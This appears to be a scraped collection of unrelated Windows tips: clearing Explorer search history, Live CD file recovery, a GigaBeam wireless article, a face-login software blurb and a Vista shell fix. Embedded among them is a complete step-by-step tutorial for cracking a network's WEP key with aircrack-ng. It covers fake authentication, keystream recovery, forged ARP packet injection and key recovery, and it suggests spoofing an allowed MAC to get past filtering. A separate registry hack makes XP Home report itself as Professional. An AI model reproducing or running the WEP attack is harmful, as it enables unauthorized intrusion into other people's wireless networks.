Delete or Disable Recent Search Entries History in Windows 7 (Explorer) Search Box

Windows 7 allows users to check for files in Windows Explorer via the tiny search box in Windows Explorer. Users can easily locate files by typing the relevant keywords in the search box instead of navigating through all the folders. The search box will scour all programs and all folders in users’ personal folder and also search through all e mail messages, saved instant messages, appointments, contacts, etc. Even though this search feature is useful and helpful, there is a small problem that might matter to some users. By default, Windows 7 will automatically store all the search queries in the history.

Every time users make searches in Windows Explorer, users will find the recent search list appear in the drop down menu of the search box. Some users especially those who need to share their computer with others might feel uncomfortable with this if they need to keep their activities a secret from others. If you are one of these users or if you do not want your previous search entries to appear in the Windows Explorer search box for other reasons, there are two options for you to get rid of it: delete the historical search entries or disable/turn off display of the recent search entries.

Delete The Historical Search Entries
To delete the historical search entries or queries, the easiest way is just to click on the search entries and hit the “Delete” button from the keyboard to delete them permanently.

Alternately, users can go to Windows 7 Registry file to delete the historical searches. Users just need to type Regedit in the search box at the Start Menu, click on to the Regedit icon to access the Windows Registry Editor. In the Windows Registry Editor, go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ WordWheelQuery
At the WordWheelQuery folder, right click WordWheelQuery and select “Delete” from the sub-menu.

Users will be prompted with a dialogue box notifying users: “Are you sure you want to permanently delete this key and all of its subkeys?” Click Yes to continue. By doing so, users will be able to clean all search entries.
Turn Off or Disable Display of Recent Search Entries in the Windows Explorer Search Box
If users feel that continuously deleting the search entries is troublesome and a waste of time, users can opt to disable the search box from storing historical search entries. To do so, users who are using Windows 7 Professional (Business), Enterprise and Ultimate Editions can make changes to the group policy via the Local Group Policy Editor available in Windows 7.
Open the Local Group Policy Editor. In the Local Group Policy Editor, go to User Configuration\Administrative Templates\Windows Components\Windows Explorer. In the right-side pane, just look for Turn off display of recent search entries in the Windows Explorer search box item and double click on it to set it as Enabled. By changing the default policy setting, the machine will not display your recent searches in the search box anymore. This policy also prevents search strings from persisting in the user portion of the registry.
For Windows 7 Starter, Home Basic and Home Premium, users who do not have Local Group Policy Editor can create the same effect by making some registry hack. Users can go to Windows 7 Registry Editor again. In the Windows Registry Editor, locate the following branch:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
Users might not find the “Explorer” branch. Hence, they need to create it manually. Users can right click “Windows”, select New Key and enter “Explorer”.

Right click “Explorer” and create a DWORD value named DisableSearchBoxSuggestions. Double-click the DisableSearchBoxSuggestions and set its data as 1.

Once it is done, users can exit the Registry Editor and restart the computer for the new setting to take effect. Users will notice the suggestions for recent search entries at the Search Box no longer appear.
If deleting the search entries and turning off the display of recent search entries are not ideal solutions, users’ final resource perhaps is to completely disable the Windows Search feature. By doing it, the Search Box will be completely removed from Windows Explorer. To disable the Windows Search feature, users can go to Control Panel -> Programs -> Turn Windows features on or off. Users will be prompted with a tiny Windows with all programs listed. Scroll down the list and uncheck the box next to Windows Search. Click OK to continue. Users will thence be prompted with a reminder to warn users: Turning off Windows Search might affect other Windows features and programs installed on your computer, including default settings. Do you want to continue?. Users can chose Yes to continue and thence restart the computer for the changes to take effect.

How to Crack WEP with aircrack + inject packets (WINDOWS)

This is a tutorial for cracking WEP and injecting packets for networks with no clients. You'll be able to do so on a windows platform (tested in VISTA and works)!
-------------------------------------------------------------------------------------------

First of all I've got all my info out of this thread and the links posted there:
http://tazforum.thetazzone.com/viewtopi ... sc&start=0
I can only make this tutorial thanks to Zermelo that kept answering my question when I was lost.

GETTING EVERYTHING READY:

- The first and most important thing to do is to get an adapter that works with airodump:
check this thread for that:
http://tazforum.thetazzone.com/viewtopic.php?t=6235
and this one:
http://tazforum.thetazzone.com/viewtopi ... 01&start=0

- Then you need to install the proper drivers for your card. (I used the commview drivers.) If your card isn't compatible with Commview you'll need to install the wildpackets drivers.

to do this for cards compatible with commview download comm view here and install its drivers:
http://www.tamos.com/bitrix/redirect.ph ... es/ca5.zip

for other cards download the wildpackets drivers here:
http://www.wildpackets.com/support/downloads/drivers

NOTE: I'm going to base the rest of this tutorial on a card with the commview drivers installed!

- Next step is to download this .dll file (again only commview driver users):
http://darkircop.org/commview.dll

- Next up, download the aircrack package. Download it here:
http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip

unzip the file to your c:\ drive (it can be another drive but this is the easiest)

put the commview.dll file you just downloaded in the map you extracted (it's called aircrack and if you extracted it to your c: drive like I said it should be in c:\aircrack\)

Now go to you place where you installed Commview in (the program itself) and look for a file called "ca2k.dll" (default install dir is c:\program files\commview for wifi\)

Copy this file to the same folder as the commview.dll (c:\aircrack\)

OKAY that was a whole lot! this was just to get everything ready! If you did all of this correct you'll be able to move to the next step!
-------------------------------------------------------------------------------------------

THE CRACKING:

Step 1:
- Open a command prompt (start > run > cmd.exe)

Step 2:
- type the following in the command prompt:
cd c:\aircrack\

- HIT ENTER

Step 3:
- type the following in the same command prompt:
airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

Step 4:
- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Typ the following the the new command prompt:
cd c:\aircrack\

-HIT ENTER

Step 5:
- Now typ this in the same command prompt:
airodump-ng 127.0.0.1:666

- HIT ENTER

note: if you know what channel the to-monitor-network is on you can make it this. I recommend this!:
airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666

Airodump-ng should start capturing data from the networks on the given channel now, you'll notice it isn't going fast (except if it's a big company's network or something). We are going to speed this process up!
Take a note of the following:
1: BSSID of the network you want to crack = MAC address.
2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,...)
3: The mac of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6:
- Open a new command prompt
- Type in the following:
cd c:\aircrack\

- HIT ENTER

Step 7:
- Type in the following in command prompt:
aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing so a quick example:
ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this as the outcome:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)

if you get:
AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you'll need to get hold of a mac address that's allowed access.

if you keep getting:
sending authentication request

Try moving closer to the AP!

Step 8:
in the same command prompt as the one in step 7 type:
aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this:
Waiting for a data packet...
Read #number packets...

Step 9:

if you wait a little bit you'll soon be prompted with a packet like this:

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = the bssid
Dest. MAC = the dest mac
Source MAC = the source mac

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.

0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!!
Note 2: Check the bold part, you're going to need this file!

AGAIN DON'T CLOSE THIS COMMAND PROMPT!!

if you keep getting:
Data packet found!
Sending fragmented packet
No answer, repeating...
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating...
Sending fragmented packet
...

Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)

anyways, if you got the bytes of keystream (everything worked) it's time for the next step!

Step 10:
- Press CTRL + C in the command prompt used in step 8
- Now type in the following:
packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Remember the file I made bold in part 8? Well it's obviously the same as in 9 meaning you need to put the same filename here.
The part I made green here is the filename you use to save the packet, you can choose whatever you want but you must use this filename in the upcomming steps!

Step 11:
Now that we've got our ARP REQ packet we can start injecting!
Here's how to do this.
- Go to the command prompt used in step 9
- Type in the following:
aireplay-ng -2 -r arp-request 127.0.0.1:666

The green part once again indicates the filename!

You should now see something like this coming up:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....
0x0040: d64f b709 .O..

Use this packet ?

- Type in Y
- HIT ENTER

This should come up now:
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

sent #numberOfPackets ... (#number pps)

You'll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:
Now go back to the command prompt where you had airodump-ng in open
and press CTRL + C
now type in the following:
airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in the next step

If all goes correct you should be capturing as much packets per second as you are injecting (maybe even more).

Step 13:
when you think you have enough...
note: 200000 min for 64bit (just capture 1Million to be sure)
...press CTRL + C in the command prompt that has airodump-ng running and enter the following:
aircrack-ng -n 64 Filename.cap

note:
Filename = see previous step
64 = the bit depth of the key (128 for 128bit etc...)

and if it goes like planned a message will pop-up saying:
KEY FOUND: YourKey

That's it! I hope this was helpful, any question/remarks/complaints please ask/tell and I'll try to help/respond as soon as possible!!

How to Convert and Upgrade Windows XP Home to Professional Without Reinstalling

After installing Windows XP Home Edition or Windows XP Professional Edition onto a computer
, officially it’s impossible for user to convert, or upgrade from Windows XP Home to Pro edition, or downgrade from Windows XP Professional to Home edition without reformatting and reinstalling the operating system from clean and fresh state.

A lot of people always associate conversion of Windows XP edition to illegitimate or privacy reason, but sometimes, there may be legitimate and genuine reason for change, such as customer, who all the while using Windows XP Home Edition (HE) finally buy a genuine license product key for Professional edition to replace the illegal pirated version installed, or user receives additional license as gift, but don’t want to go through clean install Windows XP again, or want to keep using the computer with all data intact without interruption.

Here’s a trick to convert and turn Windows XP Home Edition to Windows XP Pro Edition, from within the operating system without going through installation again. Ok, let’s be frank. The hack doesn’t actually install and add in all the features from Windows XP Professional that Windows XP Home lacks of, such as Remote Desktop Server (see guide to install Remote Desktop on XP Home) and Group Policy Editor (GPedit) utility tools, which has been removed on Windows XP Home edition. Some functions which turned off and disabled via integrated switches which read from registry flag whether it’s Home or Professional edition, such as EFS, RAID support and ability to join domain, may or may not work after migration. Basically, the trick only work to let Windows XP recognizes itself as Professional edition.

To convert and upgrade Windows XP Home to Windows XP Professional, follow procedure below.

   1. Open Registry Editor (regedit).
   2. Navigate to HKEY_LOCAL_MACHINE/SYSTEM/ControlSet00X/Control/ProductOptions, where ControlSet00X is the one with the highest number.
   3. Delete the ProductSuite registry key.
   4. Then, create a new DWORD value and named it as Brand.
   5. Set the “Brand” value data as 0.
   6. Reboot the system.
   7. On boot up after the BIOS screen, press F8 to display Windows XP Startup Menu.
   8. Choose Last Known Good Configuration (LNG) and hit Enter.

Windows XP will start up as usual. After logging into the desktop, check the system properties to verify that it’s now Windows XP Professional.

How to Backup Files from Your Dead Windows Computer using Ubuntu Live CD

If you’ve ever asked for help with your Windows computer that won’t boot anymore, you’ve probably been told to “Backup all your data and then reinstall”… but if you can’t boot, how can you get to your data? That’s the question will be answer now
.
One of the easiest methods to access your data is to simply boot off an Ubuntu Live CD… and it’s completely free (except for the cost of a blank cd).

Burn an Ubuntu Live CD
If you have another computer, you can download and burn the Ubuntu Live CD using a very simple application called ImgBurn. Otherwise, you can bug one of your friends to help you burn a copy.
Just open up ImgBurn, and click the icon to “Write image file to disc”

Then click on the icon next to “Source”, pick the downloaded ISO file, stick a recordable CD into the drive, and click burn.

Now that you have the boot cd (which you should keep in a safe place, as it’s very useful), just stick it in the drive of the computer and boot from it. You should see an option to “Try Ubuntu without any change to your computer”.

Once the system has started up, the first thing you want to do is choose Places \ Computer from the menu.

This should show you all the drives available in the system, including your Windows drive. In my case, that is the 52.4 GB volume.

You can try and double-click on the drive to open it… and if it immediately works then lucky you! Most of the time it’s going to give you an error saying “Unable to mount the volume”, because Windows didn’t shut it down cleanly.

Click the Details link so that you can see the full message, and leave this window open. You’ll see a “Choice 2″ in the message, which includes the commands to force Ubuntu to use that drive even though there’s something wrong.

What you’ll want to do is open a new Terminal from Applications \  Accessories \ Terminal on the top menu. Once you’ve done that, then you’ll want to type in a bunch of commands, which I’ll walk you through.
First, we’ll want to switch to “administrator” mode, which in Linux terms is known as “root”. The simplest way to do it is with this command:

          sudo /bin/bash
Now we’ll need to create a directory that we’ll mount the drive on. The full explanation of mounting drives is a little complex, so just run this command:
mkdir /media/disk
Now comes the tricky part. You’ll need to type out a command very similar to this one, but you’ll need to replace /dev/sda1 with what you see in that message box we showed you above. This command tells Ubuntu to use the ntfs-3g driver, and force mount even if there is a problem.
mount -t ntfs-3g /dev/sda1 /media/disk -o force
If your drive is FAT32 instead of NTFS, then you can use the following command instead:
mount -t vfat -o umask=000 /dev/sda1 /media/disk

If you are having problems figuring out whether you have NTFS or FAT32, and you can’t figure out which /dev/whatever to use, then type in the following command at your prompt (make sure you already ran the command to run things as root)
fdisk -l
In the output you should see a lot more information about the available drives… you can see in this example that the filesystem type is NTFS and the device name is /dev/sda1.

At this point, you should be able to access your hard drive through the icon in Computer.

Note: If you have more than one drive in the computer, or more than one partition, they should show up separately in Computer. You should perform the same steps as above to open those drives up as well.
Backing Up to External USB
The absolute simplest thing to do at this point is to plug in an external USB drive, which should place an icon on the Ubuntu desktop, and most likely immediately pop up a nautilus window showing the contents of the drive.

Note: I plugged in a USB Flash drive for illustration… it would be better to plug in a full external USB drive so you’ll have more space for backups.
What Should I Backup?
If you aren’t extremely technical, you might be wondering what on earth you should be backing up… and that’s a very good question.
1) Best Method
If you have loads of empty space on your external drive or network share, you should simply backup the entire contents of the drive, and sort through it later. It’ll take a little longer, but at least that way you can be sure everything has been backed up.
2) Still Good
You should try and backup your entire user folder… on XP you’ll go to “Documents and Settings”, and on Vista you’ll go to “Users”, and you should see your username in the list:

You can simply copy this entire folder to your backup drive, which should contain your music, documents, bookmarks, and most of your important files.
Important Note: This will not backup your application files, and you should look around your drive and see if you’ve saved anything important somewhere else. This is especially true if you have more than one drive. Again, your best bet is to simply backup everything.
Backing Up to Network Share
If you would rather backup your drive to a network share on another computer, you can use the Places \ Connect to Server item on the menu.

Change the Service type menu to “Windows share”…

And then enter in the details for your network drive, with these being the required fields:
  • Server: Computer Name
  • Share: Shared Folder Name
  • User Name: your username

Once you click the Connect button, you’ll be prompted to enter in your password. Typically you can leave Domain set to the default, but if you have a custom workgroup name you should enter that instead. I also chose the “Remember password until you logout” button just so I won’t have to enter the password again.

Once you click the Connect button you should have an icon on the desktop for your network share.

Now you can open up the network share, and if everything is setup correctly on the shared folder side of things, you can copy all of your files across the network using the instructions above on which files to choose.

At this point you should have a backup of your data. If you backed up to an external hard drive, you might want to consider also copying those files to another computer just in case, and if you copied across the network you could consider backing that up elsewhere as well.

Faster than Fiber

A new wireless technology could beat fiber optics for speed in some applications.

Atop each of the Trump towers in New York City, there's a new type of wireless transmitter and receiver that can send and receive data at rates of more than one gigabit per second -- fast enough to stream 90 minutes of video from one tower to the next, more than one mile apart, in less than six seconds. By comparison, the same video sent over a DSL or cable Internet connection would take almost an hour to download.
This system is dubbed "WiFiber" by its creator, GigaBeam, a Virginia-based telecommunications startup. Although the technology is wireless, the company's approach -- high-speed data transferring across a point-to-point network -- is more of an alternative to fiber optics, than to Wi-Fi or Wi-Max, says John Krzywicki, the company's vice president of marketing. And it's best suited for highly specific data delivery situations.*
This kind of point-to-point wireless technology could be used in situations where digging fiber-optic trenches would disrupt an environment, their cost be prohibitive, or the installation process take too long, as in extending communications networks in cities, on battlefields, or after a disaster.
Blasting beams of data through free space is not a new idea. LightPointe and Proxim Wireless also provide such services. What makes GigaBeam's technology different is that it exploits a different part of the electromagnetic spectrum. Their systems use a region of the spectrum near visible light, at terahertz frequencies. Because of this, weather conditions in which visibility is limited, such as fog or light rain, can hamper data transmission.
GigaBeam, however, transmits at 71-76, 81-86, and 92-95 gigahertz frequencies, where these conditions generally do not cause problems. Additionally, by using this region of the spectrum, GigaBeam can outpace traditional wireless data delivery used for most wireless networks.
Because so many devices, from Wi-Fi base stations to baby monitors, use the frequencies of 2.4 and 5 gigahertz, those spectrum bands are crowded, and therefore require complex algorithms to sort and route traffic -- both data-consuming endeavors, says Jonathan Wells, GigaBeam's director of product development. With less traffic in the region between 70 to 95 gigahertz, GigaBeam can spend less time routing data, and more time delivering it. And because of the directional nature of the beam, problems of interference, which plague more spread-out signals at the traditional frequencies, are not likely; because the tight beams of data will rarely, if ever, cross each other's paths, data transmission can flow without interference, Wells says.

Correction: As a couple of readers pointed out, our title was misleading. Although the emergence of a wireless technology operating in the gigabits per second range is an advance, it does not outperform current fiber-optic lines, which can still send data much faster.

Until a few years ago, the use of these electromagnetic frequencies that have enabled Gigabeam to build a higher-speed network, were off-limits for two reasons. First, the Federal Communication Commission (FCC) approved public use of these high frequencies only in 2003, says Wells. When the FCC finalized the agreement in 2005, GigaBeam began to ship prototypes.
Second, there was no cost-effective material for making transmitters at such frequencies. Wireless transmitters that send traditional signals are made of silicon, which can't operate at frequencies in GigaBeam's range. Within the past few years, Wells says, manufacturing techniques for making high-frequency radio transmitters out of gallium arsenide have improved significantly, making the technology less cost prohibitive.
While working at these frequencies permits high-speed data rates, there's an intrinsic physical challenge: molecules in the atmosphere absorb energy at certain frequencies. To deal with this, GigaBeam exploits those frequencies that are less susceptible to absorption by air and water molecules.
But the technology is still susceptible to heavy rains. In arid conditions, Gigabeam's signal can travel about 10 miles, but in areas where heavy rains occur, says Wells, the company's radios are only guaranteed to push a signal for about a mile, with the transmission will be down for a maximum of only five minutes per year.
Even with its advances, though, Gigabeam faces the same problem as other point-to-point technologies: creating a network with an unbroken sight line. Still, it could offer some businesses an alternative to fiber optics. Currently, a GigaBeam link, which consists of a set of transmitting and receiving radios, costs around $45,000* ($30,000 for 20 or more). But Krzywicki says that improving technology is driving down costs. In addition to outfitting the Trump towers, the company has deployed a link on the campuses of Dartmouth College and Boston University, and two links for San Francisco's Public Utility Commission.
*Correction: We originally stated the cost of a link to be $30,000.

Face Recognition Software for your PC

I have been searching for a good face recognition software for the past few weeks. Nowadays many laptops are implementing this technology, the best example- Lenovo. So what does a Face Recognition technology do? It ensures computer access to authorized users only. Any other person trying to log into your pc won’t be able to do unless he’s authorized.
Today I came across two good softwares from KeyLemon known as Lemon Screen and Lemon Login. Lemon Screen automatically locks your computer when you move away and unlocks it back when you are again in front your PC. It is a simple fun and convenient application to lock and unlock yourcomputer using your face. There’s an interesting feature known as- Hijackers tracking. Using this feature you can view pictures of the person who was in front of yourcomputer before automatic lock and who typed a wrong password when computer was locked.

On the other hand Lemon Login uses your face to log in to your computer. The standard Windows XP / Vista logon screen by the KeyLemon logon screen.

KeyLemon Lemon Screen and Lemon Login are available together for price just $19.95 which is certainly worth considering the features of this software.

You can download Lemon Screen and Lemon Login Trial

7 Interesting Web operating system Applications

Web OS is a Web platform where virtual Desktop interacts with the user through a web browser and does not depend on any particular local operating system.

Wikipedia also specifies that:

"A web desktop or webtop is a network application system for integrating web applications into a web based work space. It is a virtual desktop on the web, running in a web browser as software. Web desktops often are characterized by an environment similar to that of Windows, Mac, or Linux, but are now considered to have much more functionality being dependent on the internet. Typical benefits include the ability to save work and settings over the internet rather than to the local desktop."

In this article you will read about the 7 Interesting Web OS Applications .

Vista Won't load past welcome screen

hi.

sometimes Windows vista cannot pass welcome screen..... what is the problem????

the problem is the explorer.exe is not loaded. haha
so what is rhe solution????

1. Boot in safe mode with command prompt
2. Start + R key and type explorer.exe
3. after that open registry editor

go here.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon\Shell = explorer.exe

Just make sure that anything after the "explorer.exe" is removed as they are viruses/worms by clean them all by using antivirus(for me i use GVR 4.1 to repair registry fault)
